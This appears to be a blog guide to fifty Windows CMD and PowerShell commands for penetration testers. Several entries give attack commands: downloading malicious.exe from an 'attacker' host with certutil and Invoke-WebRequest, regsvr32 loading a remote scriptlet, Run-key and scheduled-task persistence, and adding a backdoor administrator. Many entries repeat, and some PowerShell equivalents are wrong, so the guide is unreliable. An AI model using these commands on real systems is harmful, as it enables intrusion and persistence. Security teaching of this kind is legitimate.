Windows commands are essential tools for penetration testers and red team operators. Proficiency with these commands empowers effective reconnaissance, exploitation, privilege escalation, and more. In this comprehensive guide, we delve into the 50 most vital Windows commands, providing detailed explanations, command usage examples, and invaluable insights tailored for penetration testers and red team operators.
1. dir – List Files and Directories
The dir command is a fundamental tool for reconnaissance on Windows systems:
CMD Usage:
C:\> dir # List files and directories
C:\> dir /s # List files and directories recursivelyPowerShell Usage:
PS C:\> Get-ChildItem # List files and directories
PS C:\> Get-ChildItem -Recurse # List files and directories recursivelyTip: Combine with findstr in CMD or Select-String in PowerShell to search for specific filenames or keywords.
2. cd – Change Directory
Navigating directories is essential for accessing target-specific files or locations:
CMD Usage:
C:\> cd Documents # Change to "Documents" directoryPowerShell Usage:
PS C:\> Set-Location Documents # Change to "Documents" directoryTip: Quickly switch to directories containing sensitive data or configuration files.
3. echo – Display Text or Enable/Disable Command Echo
The echo command outputs text to the command prompt or can control command echoing:
CMD Usage:
C:\> echo Hello, world! # Display textPowerShell Usage:
PS C:\> Write-Output "Hello, world!" # Display textTip: Utilize echo in batch files or Write-Output in PowerShell scripts.
4. mkdir – Create Directory
Creating directories is essential for organizing your tools, scripts, and findings:
CMD Usage:
C:\> mkdir Reports # Create "Reports" directoryPowerShell Usage:
PS C:\> New-Item -ItemType Directory -Name Reports # Create "Reports" directoryTip: Organize your toolkit by creating folders for specific tasks or projects.
5. copy – Copy Files and Directories
Copying files and directories aids in preserving evidence or deploying payloads:
CMD Usage:
C:\> copy file.txt dir\ # Copy file.txt to dir\PowerShell Usage:
PS C:\> Copy-Item file.txt dir\ # Copy file.txt to dir\Tip: Copy malicious files or tools to target systems for exploitation.
6. move – Move and Rename Files
Moving or renaming files is helpful for concealing your actions or modifying system behavior:
CMD Usage:
C:\> move file.txt newdir\ # Move file.txt to newdir\PowerShell Usage:
PS C:\> Move-Item file.txt newdir\ # Move file.txt to newdir\Tip: Rename or move files to evade detection or manipulate system behavior.
7. del – Delete Files
Deleting files is essential for covering your tracks or removing evidence:
CMD Usage:
C:\> del file.txt # Delete file.txtPowerShell Usage:
PS C:\> Remove-Item file.txt # Delete file.txtTip: Use with caution as this command permanently removes files.
8. type – Display File Contents
Displaying file contents helps understand system configurations and identify vulnerabilities:
CMD Usage:
C:\> type file.txtPowerShell Usage:
PS C:\> Get-Content file.txtTip: Examine configuration files to uncover sensitive information or vulnerabilities.
9. notepad – Open Text Files with Notepad
Opening files with Notepad allows quick examination or modification of contents:
CMD Usage:
C:\> notepad file.txtPowerShell Usage:
PS C:\> notepad file.txtTip: Quickly edit configuration files or analyze logs with Notepad.
10. findstr – Search for Strings in Files
Searching for text patterns is essential for identifying vulnerabilities or sensitive data:
CMD Usage:
C:\> type file.txt | findstr "pattern"PowerShell Usage:
PS C:\> Get-Content file.txt | Select-String "pattern"Tip: Uncover vulnerabilities by searching for keywords in configuration files or source code.
11. tasklist – List Running Processes
Listing processes aids in identifying active applications and potential attack vectors:
CMD Usage:
C:\> tasklist # List running processesPowerShell Usage:
PS C:\> Get-Process # List running processesTip: Detect suspicious processes or unauthorized applications.
12. taskkill – Terminate Processes
Terminating processes is vital for stopping unwanted or malicious applications:
CMD Usage:
C:\> taskkill /im process.exe /f # Terminate a process by image namePowerShell Usage:
PS C:\> Stop-Process -Name process.exe -Force # Terminate a process by nameTip: Halt malicious processes or applications that pose a threat.
13. netstat – Display Network Statistics
Monitoring network connections helps identify open ports and network activities:
CMD Usage:
C:\> netstat -ano # Display active network connectionsPowerShell Usage:
PS C:\> Get-NetTCPConnection # Display active network connectionsTip: Identify active connections and potential attack vectors.
14. ipconfig – Display IP Configuration
Viewing IP configuration aids in understanding network settings and potential vulnerabilities:
CMD Usage:
C:\> ipconfig # Display IP configurationPowerShell Usage:
PS C:\> Get-NetIPAddress # Display IP configurationTip: Identify IP addresses, network interfaces, and DNS configurations.
15. ping – Test Network Connectivity
Testing network connectivity helps identify live hosts and assess network latency:
CMD Usage:
C:\> ping google.comPowerShell Usage:
PS C:\> Test-Connection google.comTip: Determine if a target is reachable and assess network responsiveness.
16. nslookup – DNS Lookup
Performing DNS lookups is useful for resolving hostnames or IP addresses:
CMD Usage:
C:\> nslookup google.comPowerShell Usage:
PS C:\> Resolve-DnsName google.comTip: Gather information about target systems through DNS records.
17. wmic – Windows Management Instrumentation Command-line
Interacting with Windows Management Instrumentation helps gather system information:
CMD Usage:
C:\> wmic process list briefPowerShell Usage:
PS C:\> Get-WmiObject Win32_Process # List processesTip: Collect information about processes, services, and hardware configurations.
18. systeminfo – Display System Information
Viewing system information provides insights into the operating system and hardware:
CMD Usage:
C:\> systeminfoPowerShell Usage:
PS C:\> Get-ComputerInfoTip: Gather details about the system, OS version, and installed updates.
19. reg query – Query Registry Information
Interacting with the Windows Registry assists in gathering system configuration details:
CMD Usage:
C:\> reg query HKLM\Software\Microsoft\Windows\CurrentVersion /v ProductNamePowerShell Usage:
PS C:\> Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion" -Name "ProductName"Tip: Extract information from the registry, such as installed software or settings.
20. reg add and reg delete – Modify Registry Entries
Modifying registry entries aids in altering system configurations or disabling security settings:
CMD Usage:
C:\> reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Malware" /t REG_SZ /d "C:\malware.exe"PowerShell Usage:
PS C:\> Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Malware" -Value "C:\malware.exe"Tip: Modify startup entries for persistence or disable security mechanisms.
21. net user – Manage User Accounts
Managing user accounts is crucial for privilege escalation and lateral movement:
CMD Usage:
C:\> net user newuser newpassword /add # Add a new userPowerShell Usage:
PS C:\> New-LocalUser -Name newuser -Password (ConvertTo-SecureString -String "newpassword" -AsPlainText -Force) -AccountNeverExpiresTip: Exploit weak user accounts or escalate privileges by creating new users.
22. net localgroup – Manage Local Groups
Managing local groups is essential for privilege escalation and controlling system access:
CMD Usage:
C:\> net localgroup Administrators newuser /add # Add user to Administrators groupPowerShell Usage:
PS C:\> Add-LocalGroupMember -Group "Administrators" -Member "newuser"Tip: Escalate privileges by adding users to high-privileged groups.
23. net share – Manage Shared Resources
Managing shared resources helps identify vulnerabilities or lateral movement opportunities:
CMD Usage:
C:\> net share # List shared resourcesPowerShell Usage:
PS C:\> Get-SmbShare # List shared resourcesTip: Identify exposed file shares for potential exploitation.
24. net use – Connect to Shared Resources
Connecting to shared resources assists in lateral movement and data exfiltration:
CMD Usage:
C:\> net use \\target\share /user:username passwordPowerShell Usage:
PS C:\> New-SmbMapping -LocalPath "Z:" -RemotePath "\\target\share" -Username username -Password (ConvertTo-SecureString -String "password" -AsPlainText -Force)Tip: Map network drives for easy access to shared resources.
25. netstat – Display Network Statistics
Monitoring network connections helps identify open ports and network activities:
CMD Usage:
C:\> netstat -ano # Display active network connectionsPowerShell Usage:
PS C:\> Get-NetTCPConnection # Display active network connectionsTip: Identify active connections and potential attack vectors.
26. route – Display or Modify Network Routing
Displaying or modifying network routing is useful for pivoting or network manipulation:
CMD Usage:
C:\> route print # Display routing tablePowerShell Usage:
PS C:\> Get-NetRoute # Display routing tableTip: Modify network routing to redirect traffic for exploitation.
27. netsh – Network Shell
Interacting with network settings and configurations helps manipulate network behavior:
CMD Usage:
C:\> netsh wlan show profiles # Display Wi-Fi profilesPowerShell Usage:
PS C:\> Get-NetConnectionProfile # Display Wi-Fi profilesTip: Manipulate firewall rules or discover saved Wi-Fi passwords.
28. whoami – Display User and Group Information
Displaying user and group information helps understand available privileges:
CMD Usage:
C:\> whoamiPowerShell Usage:
PS C:\> whoami /groupsTip: Determine your user context and associated groups for privilege analysis.
29. systeminfo – Display System Information
Viewing system information provides insights into the operating system and hardware:
CMD Usage:
C:\> systeminfoPowerShell Usage:
PS C:\> Get-ComputerInfoTip: Gather details about the system, OS version, and installed updates.
30. driverquery – Display Installed Device Drivers
Listing installed device drivers aids in identifying potential vulnerabilities:
CMD Usage:
C:\> driverqueryPowerShell Usage:
PS C:\> Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersionTip: Identify outdated or vulnerable device drivers for exploitation.
31. sc – Service Control
Interacting with Windows services helps control system behavior and persistence:
CMD Usage:
C:\> sc query # List all servicesPowerShell Usage:
PS C:\> Get-Service # List all servicesTip: Disable or modify services for persistence or to disable security mechanisms.
32. schtasks – Schedule Tasks
Scheduling tasks aids in persistence and automated exploitation:
CMD Usage:
C:\> schtasks /create /tn "My
Task" /tr "malicious.exe" /sc daily /st 00:00PowerShell Usage:
PS C:\> Register-ScheduledTask -TaskName "MyTask" -Action (New-ScheduledTaskAction -Execute "malicious.exe") -Trigger (New-ScheduledTaskTrigger -Daily -At 00:00)Tip: Schedule malicious payloads or backdoors for automated execution.
33. regsvr32 – Register and Unregister DLLs
Registering or unregistering DLLs can aid in executing malicious code or maintaining persistence:
CMD Usage:
C:\> regsvr32 /s /i:http://attacker/evil.sct scrobj.dll # Register with remote contentPowerShell Usage:
PS C:\> rundll32.exe malicious.dll,EntryPointTip: Exploit DLL hijacking vulnerabilities or execute malicious scripts.
34. cipher – Manage File Encryption
Managing file encryption helps protect sensitive data or manipulate encrypted files:
CMD Usage:
C:\> cipher /e filename.txt # Encrypt filePowerShell Usage:
PS C:\> Protect-CmsMessage -To recipient@example.com -From sender@example.com -Subject "Encrypted Message" -Body "This is a secret message" -OutFile "encryptedMessage.txt"Tip: Encrypt files for data exfiltration or manipulate encrypted data.
35. tasklist – List Running Processes
Listing processes aids in identifying active applications and potential attack vectors:
CMD Usage:
C:\> tasklist # List running processesPowerShell Usage:
PS C:\> Get-Process # List running processesTip: Detect suspicious processes or unauthorized applications.
36. taskkill – Terminate Processes
Terminating processes is vital for stopping unwanted or malicious applications:
CMD Usage:
C:\> taskkill /im process.exe /f # Terminate a process by image namePowerShell Usage:
PS C:\> Stop-Process -Name process.exe -Force # Terminate a process by nameTip: Halt malicious processes or applications that pose a threat.
37. powercfg – Power Configuration
Interacting with power configurations can assist in controlling system behavior and persistence:
CMD Usage:
C:\> powercfg /hibernate off # Disable hibernationPowerShell Usage:
PS C:\> Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Power" -Name "HibernateEnabled" -Value 0Tip: Manipulate power settings for system manipulation or preservation.
38. wmic – Windows Management Instrumentation Command-line
Interacting with Windows Management Instrumentation helps gather system information:
CMD Usage:
C:\> wmic process list briefPowerShell Usage:
PS C:\> Get-WmiObject Win32_Process # List processesTip: Collect information about processes, services, and hardware configurations.
39. msfconsole – Metasploit Framework Console
Using Metasploit aids in exploiting vulnerabilities and conducting penetration tests:
CMD and PowerShell Usage:
C:\> msfconsoleTip: Exploit known vulnerabilities using Metasploit’s extensive collection of modules.
40. certutil – File Utility for Downloading and Displaying Files
Interacting with certificates aids in downloading files or executing malicious payloads:
CMD Usage:
C:\> certutil -urlcache -f http://attacker/malicious.exe C:\malicious.exePowerShell Usage:
PS C:\> Invoke-WebRequest -Uri http://attacker/malicious.exe -OutFile C:\malicious.exeTip: Download malicious files for exploitation or lateral movement.
41. nmap – Network Mapping and Port Scanning
Using Nmap assists in network reconnaissance and identifying potential attack vectors:
CMD and PowerShell Usage:
C:\> nmap -sV -p 1-1000 targetTip: Identify open ports and services on target systems for exploitation.
42. netsh – Network Shell
Interacting with network settings and configurations helps manipulate network behavior:
CMD Usage:
C:\> netsh wlan show profiles # Display Wi-Fi profilesPowerShell Usage:
PS C:\> Get-NetConnectionProfile # Display Wi-Fi profilesTip: Manipulate firewall rules or discover saved Wi-Fi passwords.
43. net user – Manage User Accounts
Managing user accounts is crucial for privilege escalation and lateral movement:
CMD Usage:
C:\> net user newuser newpassword /add # Add a new userPowerShell Usage:
PS C:\> New-LocalUser -Name newuser -Password (ConvertTo-SecureString -String "newpassword" -AsPlainText -Force) -AccountNeverExpiresTip: Exploit weak user accounts or escalate privileges by creating new users.
44. net localgroup – Manage Local Groups
Managing local groups is essential for privilege escalation and controlling system access:
CMD Usage:
C:\> net localgroup Administrators newuser /add # Add user to Administrators groupPowerShell Usage:
PS C:\> Add-LocalGroupMember -Group "Administrators" -Member "newuser"Tip: Escalate privileges by adding users to high-privileged groups.
45. net share – Manage Shared Resources
Managing shared resources helps identify vulnerabilities or lateral movement opportunities:
CMD Usage:
C:\> net share # List shared resourcesPowerShell Usage:
PS C:\> Get-SmbShare # List shared resourcesTip: Identify exposed file shares for potential exploitation.
46. net use – Connect to Shared Resources
Connecting to shared resources assists in lateral movement and data exfiltr
ation:
CMD Usage:
C:\> net use \\target\share /user:username passwordPowerShell Usage:
PS C:\> New-SmbMapping -LocalPath "Z:" -RemotePath "\\target\share" -Username username -Password (ConvertTo-SecureString -String "password" -AsPlainText -Force)Tip: Map network drives for easy access to shared resources.
47. netstat – Display Network Statistics
Monitoring network connections helps identify open ports and network activities:
CMD Usage:
C:\> netstat -ano # Display active network connectionsPowerShell Usage:
PS C:\> Get-NetTCPConnection # Display active network connectionsTip: Identify active connections and potential attack vectors.
48. route – Display or Modify Network Routing
Displaying or modifying network routing is useful for pivoting or network manipulation:
CMD Usage:
C:\> route print # Display routing tablePowerShell Usage:
PS C:\> Get-NetRoute # Display routing tableTip: Modify network routing to redirect traffic for exploitation.
49. netsh – Network Shell
Interacting with network settings and configurations helps manipulate network behavior:
CMD Usage:
C:\> netsh wlan show profiles # Display Wi-Fi profilesPowerShell Usage:
PS C:\> Get-NetConnectionProfile # Display Wi-Fi profilesTip: Manipulate firewall rules or discover saved Wi-Fi passwords.
50. whoami – Display User and Group Information
Displaying user and group information helps understand available privileges:
CMD Usage:
C:\> whoamiPowerShell Usage:
PS C:\> whoami /groupsTip: Determine your user context and associated groups for privilege analysis.
Mastering these 50 Windows commands is a crucial step toward becoming a skilled penetration tester or red team operator. By honing your skills with these tools, you’ll be well-equipped to navigate a variety of scenarios, from reconnaissance to exploitation and beyond. As you continually refine your abilities, delve into more advanced Windows concepts and expand your toolkit, you’ll develop the expertise needed to excel in the dynamic field of cybersecurity. Best of luck in your journey of penetration testing and red teaming!